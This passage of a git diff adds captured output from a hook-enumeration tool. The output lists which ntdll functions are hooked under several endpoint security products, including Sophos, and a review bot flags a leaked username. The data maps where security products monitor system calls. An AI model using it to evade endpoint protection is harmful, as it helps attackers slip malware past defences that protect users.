+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtUnmapViewOfSection is hooked to 0x00007ff9e132d510
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQuerySecurityAttributesToken is hooked to 0x00007ff9e132fb20
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtGetCachedSigningLevel is hooked to 0x00007ff9e132ede0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtDeviceIoControlFile is hooked to 0x00007ff9e132d0b0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtReadFile is hooked to 0x00007ff9e132d090
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtWaitForMultipleObjects is hooked to 0x00007ff9e132db20
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetSystemInformation is hooked to 0x00007ff9e1330540
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtYieldExecution is hooked to 0x00007ff9e132d890
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtDuplicateToken is hooked to 0x00007ff9e132d810
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAllocateLocallyUniqueId is hooked to 0x00007ff9e132dde0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheck is hooked to 0x00007ff9e132cfd0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheckByType is hooked to 0x00007ff9e132dc20
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheckByTypeResultList is hooked to 0x00007ff9e132dc40
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenProcessToken is hooked to 0x00007ff9e132f4e0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenThreadToken is hooked to 0x00007ff9e132d450
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetInformationToken is hooked to 0x00007ff9e1330360
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAdjustPrivilegesToken is hooked to 0x00007ff9e132d7f0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAdjustGroupsToken is hooked to 0x00007ff9e132dd40
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtPrivilegeCheck is hooked to 0x00007ff9e132f6c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheckAndAuditAlarm is hooked to 0x00007ff9e132d4f0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheckByTypeAndAuditAlarm is hooked to 0x00007ff9e132daf0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheckByTypeResultListAndAuditAlarm is hooked to 0x00007ff9e132dc60
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAccessCheckByTypeResultListAndAuditAlarmByHandle is hooked to 0x00007ff9e132dc80
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenObjectAuditAlarm is hooked to 0x00007ff9e132f480
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtPrivilegeObjectAuditAlarm is hooked to 0x00007ff9e132f6e0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCloseObjectAuditAlarm is hooked to 0x00007ff9e132d730
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtDeleteObjectAuditAlarm is hooked to 0x00007ff9e132ea60
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtPrivilegedServiceAuditAlarm is hooked to 0x00007ff9e132f700
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtSetInformationThread is hooked to 0x00007ff9e132d170
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtImpersonateAnonymousToken is hooked to 0x00007ff9e132ef60
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtFilterToken is hooked to 0x00007ff9e132ec60
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetCachedSigningLevel is hooked to 0x00007ff9e1330120
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtLockVirtualMemory is hooked to 0x00007ff9e132f180
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtUnlockVirtualMemory is hooked to 0x00007ff9e1330960
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtReadVirtualMemory is hooked to 0x00007ff9e132d7b0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtProtectVirtualMemory is hooked to 0x00007ff9e132d9d0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtWriteVirtualMemory is hooked to 0x00007ff9e132d710
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAllocateVirtualMemory is hooked to 0x00007ff9e132d2d0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAllocateVirtualMemoryEx is hooked to 0x00007ff9e132de80
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtFreeVirtualMemory is hooked to 0x00007ff9e132d390
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenEvent is hooked to 0x00007ff9e132d7d0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtGetWriteWatch is hooked to 0x00007ff9e132ef40
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtResetWriteWatch is hooked to 0x00007ff9e132ff20
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetInformationVirtualMemory is hooked to 0x00007ff9e13303c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtAllocateUserPhysicalPages is hooked to 0x00007ff9e132de20
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtFreeUserPhysicalPages is hooked to 0x00007ff9e132ed80
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtMapUserPhysicalPages is hooked to 0x00007ff9e132f240
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenDirectoryObject is hooked to 0x00007ff9e132dad0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryObject is hooked to 0x00007ff9e132d1d0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateSymbolicLinkObject is hooked to 0x00007ff9e132e7e0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateDirectoryObjectEx is hooked to 0x00007ff9e132e4c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtLoadEnclaveData is hooked to 0x00007ff9e132f0a0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtTerminateEnclave is hooked to 0x00007ff9e13307c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateNamedPipeFile is hooked to 0x00007ff9e132e660
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtWriteFile is hooked to 0x00007ff9e132d0d0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtLockFile is hooked to 0x00007ff9e132f120
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtUnlockFile is hooked to 0x00007ff9e1330940
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCancelIoFile is hooked to 0x00007ff9e132db60
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCancelIoFileEx is hooked to 0x00007ff9e132e200
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCancelSynchronousIoFile is hooked to 0x00007ff9e132e220
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtReadFileScatter is hooked to 0x00007ff9e132d590
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtWriteFileGather is hooked to 0x00007ff9e132d330
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetEvent is hooked to 0x00007ff9e132d190
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtClearEvent is hooked to 0x00007ff9e132d790
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtPulseEvent is hooked to 0x00007ff9e132f780
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateSemaphore is hooked to 0x00007ff9e132e7c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenSemaphore is hooked to 0x00007ff9e132f540
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtReleaseSemaphore is hooked to 0x00007ff9e132d110
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateMutant is hooked to 0x00007ff9e132e640
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateTimer2 is hooked to 0x00007ff9e132e840
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCreateTimer is hooked to 0x00007ff9e132e820
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenTimer is hooked to 0x00007ff9e132f5c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetTimerEx is hooked to 0x00007ff9e13305e0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCancelTimer is hooked to 0x00007ff9e132dbe0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSignalAndWaitForSingleObject is hooked to 0x00007ff9e13306c0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtDelayExecution is hooked to 0x00007ff9e132d650
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtOpenProcess is hooked to 0x00007ff9e132d490
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtCompareObjects is hooked to 0x00007ff9e132e320
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetInformationObject is hooked to 0x00007ff9e132db40
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSetSystemTime is hooked to 0x00007ff9e1330580
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryAuxiliaryCounterFrequency is hooked to 0x00007ff9e132f7a0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtConvertBetweenAuxiliaryCounterAndPerformanceCounter is hooked to 0x00007ff9e132e400
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtCreateThreadEx is hooked to 0x00007ff9e132e800
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtResumeThread is hooked to 0x00007ff9e132da10
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtTerminateThread is hooked to 0x00007ff9e132da30
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtOpenThread is hooked to 0x00007ff9e132f5a0
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtQueryInformationThread is hooked to 0x00007ff9e132d470
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtSuspendThread is hooked to 0x00007ff9e1330780
+ |-- KERNELBASE.dll IAT to ntdll.dll of function NtGetContextThread is hooked to 0x00007ff9e132ee20
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtSetContextThread is hooked to 0x00007ff9e1330160
+ |-- KERNELBASE.dll IAT to ntdll.dll of function *NtQueueApcThreadEx2 is hooked to 0x00007ff9e132fca0
+ +-- 147 hooked functions.
+
+Checking ntdll.dll at InProcessClient64.dll IAT
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtOpenSection is hooked to 0x00007ff9e132d6b0
+ |-- InProcessClient64.dll IAT to ntdll.dll of function *NtQueueApcThread is hooked to 0x00007ff9e132d870
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtQueryVirtualMemory is hooked to 0x00007ff9e132d430
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtQueryObject is hooked to 0x00007ff9e132d1d0
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtQuerySection is hooked to 0x00007ff9e132d9f0
+ |-- InProcessClient64.dll IAT to ntdll.dll of function *NtSetInformationThread is hooked to 0x00007ff9e132d170
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtQueryKey is hooked to 0x00007ff9e132d290
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtCreateFile is hooked to 0x00007ff9e132da70
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtQueryInformationProcess is hooked to 0x00007ff9e132d2f0
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtQueryInformationThread is hooked to 0x00007ff9e132d470
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtCallbackReturn is hooked to 0x00007ff9e132d070
+ |-- InProcessClient64.dll IAT to ntdll.dll of function NtGetNextThread is hooked to 0x00007ff9e132eee0
+ +-- 12 hooked functions.
+
+Checking ntdll.dll at ADVAPI32.dll IAT
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryValueKey is hooked to 0x00007ff9e132d2b0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtClose is hooked to 0x00007ff9e132d1b0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenThreadToken is hooked to 0x00007ff9e132d450
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenProcessToken is hooked to 0x00007ff9e132f4e0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtSetInformationToken is hooked to 0x00007ff9e1330360
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtDuplicateToken is hooked to 0x00007ff9e132d810
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtCompareTokens is hooked to 0x00007ff9e132e360
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenFile is hooked to 0x00007ff9e132d630
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryInformationProcess is hooked to 0x00007ff9e132d2f0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryKey is hooked to 0x00007ff9e132d290
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtDeviceIoControlFile is hooked to 0x00007ff9e132d0b0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function *NtQuerySystemInformation is hooked to 0x00007ff9e132d690
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtCreateKey is hooked to 0x00007ff9e132d370
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtSetValueKey is hooked to 0x00007ff9e132dbc0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtDeleteKey is hooked to 0x00007ff9e132ea40
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtEnumerateKey is hooked to 0x00007ff9e132d610
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryVolumeInformationFile is hooked to 0x00007ff9e132d8f0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenSymbolicLinkObject is hooked to 0x00007ff9e132f580
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQuerySymbolicLinkObject is hooked to 0x00007ff9e132fba0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryInformationFile is hooked to 0x00007ff9e132d1f0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtTraceControl is hooked to 0x00007ff9e1330860
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtRenameKey is hooked to 0x00007ff9e132fe40
+ |-- ADVAPI32.dll IAT to ntdll.dll of function *NtSetInformationThread is hooked to 0x00007ff9e132d170
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenKey is hooked to 0x00007ff9e132d210
+ |-- ADVAPI32.dll IAT to ntdll.dll of function *NtQuerySystemTime is hooked to 0x00007ff9e132db10
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtWaitForSingleObject is hooked to 0x00007ff9e132d050
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryInformationThread is hooked to 0x00007ff9e132d470
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQuerySecurityObject is hooked to 0x00007ff9e132fb40
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryPerformanceCounter is hooked to 0x00007ff9e132d5f0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtCreateMutant is hooked to 0x00007ff9e132e640
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenPrivateNamespace is hooked to 0x00007ff9e132f4c0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtCreatePrivateNamespace is hooked to 0x00007ff9e132e6e0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtWaitForMultipleObjects is hooked to 0x00007ff9e132db20
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtCreateFile is hooked to 0x00007ff9e132da70
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtWriteFile is hooked to 0x00007ff9e132d0d0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtReadFile is hooked to 0x00007ff9e132d090
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtAlpcQueryInformation is hooked to 0x00007ff9e132e0e0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryObject is hooked to 0x00007ff9e132d1d0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryMutant is hooked to 0x00007ff9e132fa80
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtReplaceKey is hooked to 0x00007ff9e132fe80
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtSaveKey is hooked to 0x00007ff9e1330040
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtSaveMergedKeys is hooked to 0x00007ff9e1330080
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtQueryInformationToken is hooked to 0x00007ff9e132d3f0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtSetSystemInformation is hooked to 0x00007ff9e1330540
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtOpenKeyEx is hooked to 0x00007ff9e132f3e0
+ |-- ADVAPI32.dll IAT to ntdll.dll of function NtSetInformationKey is hooked to 0x00007ff9e1330300
+ +-- 46 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at sechost.dll IAT
+ |-- sechost.dll IAT to ntdll.dll of function NtOpenProcessTokenEx is hooked to 0x00007ff9e132d5d0
+ |-- sechost.dll IAT to ntdll.dll of function NtOpenKey is hooked to 0x00007ff9e132d210
+ |-- sechost.dll IAT to ntdll.dll of function NtQueryValueKey is hooked to 0x00007ff9e132d2b0
+ |-- sechost.dll IAT to ntdll.dll of function *NtSetInformationThread is hooked to 0x00007ff9e132d170
+ |-- sechost.dll IAT to ntdll.dll of function NtQueryInformationThread is hooked to 0x00007ff9e132d470
+ |-- sechost.dll IAT to ntdll.dll of function *NtQueueApcThread is hooked to 0x00007ff9e132d870
+ |-- sechost.dll IAT to ntdll.dll of function NtQueryInformationFile is hooked to 0x00007ff9e132d1f0
+ |-- sechost.dll IAT to ntdll.dll of function NtCancelIoFile is hooked to 0x00007ff9e132db60
+ |-- sechost.dll IAT to ntdll.dll of function NtTraceControl is hooked to 0x00007ff9e1330860
+ |-- sechost.dll IAT to ntdll.dll of function NtSetSystemInformation is hooked to 0x00007ff9e1330540
+ |-- sechost.dll IAT to ntdll.dll of function NtSetIntervalProfile is hooked to 0x00007ff9e1330400
+ |-- sechost.dll IAT to ntdll.dll of function *NtQuerySystemInformation is hooked to 0x00007ff9e132d690
+ |-- sechost.dll IAT to ntdll.dll of function NtQueryIntervalProfile is hooked to 0x00007ff9e132fa00
+ |-- sechost.dll IAT to ntdll.dll of function NtWaitForMultipleObjects is hooked to 0x00007ff9e132db20
+ |-- sechost.dll IAT to ntdll.dll of function NtQueryPerformanceCounter is hooked to 0x00007ff9e132d5f0
+ |-- sechost.dll IAT to ntdll.dll of function NtSetEvent is hooked to 0x00007ff9e132d190
+ |-- sechost.dll IAT to ntdll.dll of function *NtTerminateProcess is hooked to 0x00007ff9e132d550
+ |-- sechost.dll IAT to ntdll.dll of function NtOpenThreadToken is hooked to 0x00007ff9e132d450
+ |-- sechost.dll IAT to ntdll.dll of function NtClose is hooked to 0x00007ff9e132d1b0
+ |-- sechost.dll IAT to ntdll.dll of function NtQueryInformationToken is hooked to 0x00007ff9e132d3f0
+ |-- sechost.dll IAT to ntdll.dll of function NtOpenProcessToken is hooked to 0x00007ff9e132f4e0
+ +-- 21 hooked functions.
+
+Checking ntdll.dll at RPCRT4.dll IAT
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtQueryValueKey is hooked to 0x00007ff9e132d2b0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtOpenKey is hooked to 0x00007ff9e132d210
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtWaitForAlertByThreadId is hooked to 0x00007ff9e1330a00
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlertThreadByThreadId is hooked to 0x00007ff9e132ddc0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAllocateUuids is hooked to 0x00007ff9e132de60
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAdjustPrivilegesToken is hooked to 0x00007ff9e132d7f0
+ |-- RPCRT4.dll IAT to ntdll.dll of function *NtQuerySystemTime is hooked to 0x00007ff9e132db10
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtPrivilegeCheck is hooked to 0x00007ff9e132f6c0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcCreateResourceReserve is hooked to 0x00007ff9e132df60
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcCancelMessage is hooked to 0x00007ff9e132dec0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcDeleteSecurityContext is hooked to 0x00007ff9e132e020
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcCreateSecurityContext is hooked to 0x00007ff9e132dfa0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcConnectPortEx is hooked to 0x00007ff9e132df00
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcConnectPort is hooked to 0x00007ff9e132dee0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtCreateSection is hooked to 0x00007ff9e132d910
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtDuplicateToken is hooked to 0x00007ff9e132d810
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtImpersonateAnonymousToken is hooked to 0x00007ff9e132ef60
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcCreateSectionView is hooked to 0x00007ff9e132df80
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcCreatePortSection is hooked to 0x00007ff9e132df40
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAllocateReserveObject is hooked to 0x00007ff9e132de00
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtSetIoCompletionEx is hooked to 0x00007ff9e1330440
+ |-- RPCRT4.dll IAT to ntdll.dll of function *NtQueueApcThreadEx is hooked to 0x00007ff9e132fc80
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtOpenThreadToken is hooked to 0x00007ff9e132d450
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtDeleteWnfStateName is hooked to 0x00007ff9e132eae0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtCreateWnfStateName is hooked to 0x00007ff9e132e940
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtQuerySecurityObject is hooked to 0x00007ff9e132fb40
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtOpenDirectoryObject is hooked to 0x00007ff9e132dad0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtDelayExecution is hooked to 0x00007ff9e132d650
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtWaitForSingleObject is hooked to 0x00007ff9e132d050
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtFsControlFile is hooked to 0x00007ff9e132d6f0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtCreateEvent is hooked to 0x00007ff9e132d8d0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtQueryVolumeInformationFile is hooked to 0x00007ff9e132d8f0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcCreatePort is hooked to 0x00007ff9e132df20
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcQueryInformation is hooked to 0x00007ff9e132e0e0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcSendWaitReceivePort is hooked to 0x00007ff9e132e140
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcAcceptConnectPort is hooked to 0x00007ff9e132dea0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcDeletePortSection is hooked to 0x00007ff9e132dfc0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcDeleteSectionView is hooked to 0x00007ff9e132e000
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcDisconnectPort is hooked to 0x00007ff9e132e040
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcQueryInformationMessage is hooked to 0x00007ff9e132e100
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtClose is hooked to 0x00007ff9e132d1b0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtCreateFile is hooked to 0x00007ff9e132da70
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtCreateNamedPipeFile is hooked to 0x00007ff9e132e660
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtWriteFile is hooked to 0x00007ff9e132d0d0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcSetInformation is hooked to 0x00007ff9e132e160
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtReadFile is hooked to 0x00007ff9e132d090
+ |-- RPCRT4.dll IAT to ntdll.dll of function *NtQuerySystemInformation is hooked to 0x00007ff9e132d690
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtSetInformationFile is hooked to 0x00007ff9e132d4b0
+ |-- RPCRT4.dll IAT to ntdll.dll of function *NtSetInformationThread is hooked to 0x00007ff9e132d170
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcOpenSenderThread is hooked to 0x00007ff9e132e0c0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcOpenSenderProcess is hooked to 0x00007ff9e132e0a0
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcImpersonateClientContainerOfPort is hooked to 0x00007ff9e132e060
+ |-- RPCRT4.dll IAT to ntdll.dll of function NtAlpcImpersonateClientOfPort is hooked to 0x00007ff9e132e080
+ +-- 53 hooked functions.
+
+Checking ntdll.dll at bcrypt.dll IAT
+ |-- bcrypt.dll IAT to ntdll.dll of function NtOpenKey is hooked to 0x00007ff9e132d210
+ |-- bcrypt.dll IAT to ntdll.dll of function NtQueryValueKey is hooked to 0x00007ff9e132d2b0
+ |-- bcrypt.dll IAT to ntdll.dll of function NtQueryInformationProcess is hooked to 0x00007ff9e132d2f0
+ |-- bcrypt.dll IAT to ntdll.dll of function NtClose is hooked to 0x00007ff9e132d1b0
+ |-- bcrypt.dll IAT to ntdll.dll of function NtDeviceIoControlFile is hooked to 0x00007ff9e132d0b0
+ |-- bcrypt.dll IAT to ntdll.dll of function NtOpenFile is hooked to 0x00007ff9e132d630
+ |-- bcrypt.dll IAT to ntdll.dll of function *NtTerminateProcess is hooked to 0x00007ff9e132d550
+ +-- 7 hooked functions.
+
+Checking ntdll.dll at FLTLIB.DLL IAT
+ |-- FLTLIB.DLL IAT to ntdll.dll of function NtCreateFile is hooked to 0x00007ff9e132da70
+ |-- FLTLIB.DLL IAT to ntdll.dll of function NtDeviceIoControlFile is hooked to 0x00007ff9e132d0b0
+ |-- FLTLIB.DLL IAT to ntdll.dll of function NtWaitForSingleObject is hooked to 0x00007ff9e132d050
+ |-- FLTLIB.DLL IAT to ntdll.dll of function NtFsControlFile is hooked to 0x00007ff9e132d6f0
+ +-- 4 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/sophos.txt b/enum/results_enum/sophos.txt
new file mode 100644
index 0000000..437c490
--- /dev/null
+++ b/enum/results_enum/sophos.txt
@@ -0,0 +1,44 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtAllocateVirtualMemory is hooked
+NtAlpcConnectPort is hooked
+NtCreateProcessEx is hooked
+NtFreeVirtualMemory is hooked
+NtMapViewOfSection is hooked
+NtProtectVirtualMemory is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtQueueApcThreadEx is hooked
+NtQueueApcThreadEx2 is hooked
+NtReadVirtualMemory is hooked
+NtSetContextThread is hooked
+NtUnmapViewOfSection is hooked
+NtWriteVirtualMemory is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff7a3fc0000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ffa4b9d0000.
+C:\Windows\system32\hmpalert.dll is loaded at 0x00007ffa48e50000.
+C:\WINDOWS\System32\KERNEL32.dll is loaded at 0x00007ffa4a1f0000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ffa49360000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ffa46890000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ffa4a070000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
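Review bot: The committed result captures contain the operator's local account name in the executable path (`C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe`), which leaks identifying information into a public repository for no analytical benefit; the same applies to the symantec_sep.txt, trellix.txt and trend.txt hunks below. Scrubbing that path component to a placeholder such as `C:\Users\<REDACTED>\Desktop\hookchain_finder64.exe` before committing would keep the capture equally useful. The files also record no product version, OS build or capture date, so a future reader cannot tell whether a "0 hooked functions" finding still describes the product; only trend.txt carries partial version hints inside module paths. A one-line header per file, e.g. `# product: <PRODUCT> <VERSION>, os build: <BUILD>, captured: <DATE>` (placeholders), or a sidecar README with the same fields, would make the results interpretable over time. Each file is also committed without a trailing newline.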
diff --git a/enum/results_enum/symantec_sep.txt b/enum/results_enum/symantec_sep.txt
new file mode 100644
index 0000000..70469e2
--- /dev/null
